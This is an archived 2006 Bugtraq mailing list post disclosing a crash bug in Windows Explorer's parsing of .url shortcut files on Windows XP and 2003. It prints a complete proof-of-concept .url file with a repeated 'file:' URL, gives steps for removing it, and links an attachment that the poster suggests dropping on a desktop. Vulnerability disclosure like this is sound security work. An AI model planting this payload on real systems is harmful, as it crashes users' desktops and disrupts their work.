Home page logo
/

bugtraq logo Bugtraq mailing list archives

Windows Explorer URL File format overflow
From: nanika () chroot org
Date: 5 Jul 2006 05:53:52 -0000

Windows Explorer URL File format overflow


Affected Vendor:
Microsoft 

Affected Products:
WindowsXP ALL
Windows2003 ALL


Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash.




if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...


if you will del exploit.url
open taskmgr.exe
open cmd.exe

then cd your desktop

del exploit.url




Exploit:

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:


Attachment:
http://hitcon.org/Nanika-desktop_explore_0day.rar
you can drop in desktop :P


http://hitcon.org
http://www.chroot.org


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault